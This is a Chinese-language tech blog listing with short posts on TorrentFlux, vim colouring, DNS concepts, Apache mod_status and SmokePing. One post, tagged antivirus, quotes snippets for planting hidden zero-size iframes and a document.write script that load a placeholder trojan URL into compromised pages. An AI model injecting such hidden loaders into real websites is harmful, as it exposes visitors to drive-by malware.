瀏覽模式: 普通 | 列表

TorrentFlux是PHP based的 BT Client

Quote: http://linuxtoy.org/archives/torrentflux.html
TorrentFlux 是使用 PHP 寫成的 BitTorrent 下載客戶端。一旦將其架設在 Web 服務器上,你便可以通過 Web 界面對 BitTorrent 下載進行管理。這種管理具有不受地理位置限制的優點。

Quote: http://www.torrentflux.com/

What is TorrentFlux?

TorrentFlux is a FREE PHP based Torrent client that runs on a web server. Manage all of your Torrent downloads through a convenient web interface from anywhere.

If you like TorrentFlux and you use it, please help support it. "Supporting Members" have access to pre released beta code before final release. Thanks.

TorrentFlux PHP Client

在ubuntu系統下vim顯示顏色

1. 安裝 vim
2. cp /etc/vim/vimrc ~/.vimrc
3. vi ~/.vimrc
將 syntax on 前的 " 拿掉即可或自行加上這個

標籤: 編輯器

DNS 觀念

http://www.study-area.org/phorum/index.php/topic,17498.0.html

1. 上層 DNS 中 .tw 及 .com.tw 的 DNS 查詢量那一個較多 ? 為什麼 ?

答案:
com.tw 較多, 因為 .tw 的 DNS 只有六部, 很容易就被 Cache,
    且其下的 .tw 其下的 record 僅有 net/org/gov/...tw,所有資料亦不過十幾筆
     但 com.tw. 下的資料會有數萬筆以上,所以,當有人查詢
    x1.com.tw. 時,沒有 cache 就會問到 .tw 及 com.tw., 再查
    x2.com.tw. 時,因為巳有 cache, 短期內就不會再去問 .tw 了
    而是問 .com.tw , x2.com.tw. 在那裏,
   所以 com.tw. 的量會較多,且多好幾倍 !
2. 依據 ISC 及 CERT/CC 組織的說明,建議使用 BIND 運行 DNS 的人,為了安全的理由,最好都換到 BIND 9.X 版,為什麼像 HINET/SEEDNET 這些 ISP 都不願意換呢 ?

答案:

[閱讀全文]

標籤: dns

F2blog改進驗証碼和對評論過濾

ref: http://forum.f2blog.com/thread-4180-1-1.html

原本的驗證方式是五個數字,現在改為要你來算數學 :)
也就是要填入的數字是你算出來的答案

attachments/200706/6093169306.jpg
標籤: blog

當 top時,發現某個http的負載很高,我要怎麼查出它是那一個domain在作怪,

apache的模組 mod_status 可以設定  /server-status (如下)

attachments/200706/2313535438.jpg


設定 httpd.conf

[閱讀全文]

被植入不明字串有那些不同iframe

Quote: http://anti-hacker.blogspot.com/2007/06/blog-post_22.html

1.  框架掛馬

以下是部份語法:

<iframe src=木馬網址 width=0 height=0></iframe>
 

2.  JScript 文件掛馬

首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處

document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");
 

最後JScript 掛馬的語法為:

以下是部份語法:

<script language=javascript src=xxx.js></script>
 

3.  JScript 變型加密

[閱讀全文]

標籤: 防毒

網路品質觀查工具 - Smokeping

Quote: http://oss.oetiker.ch/smokeping/

About SmokePing

Graphics

SmokePing is a deluxe latency measurement tool. It can measure, store and display latency, latency distribution and packet loss. SmokePing uses RRDtool to maintain a longterm data-store and to draw pretty graphs, giving up to the minute information on the state of each network connection.

SmokePing uses latency measurement plug-ins for seamless extendability.

[閱讀全文]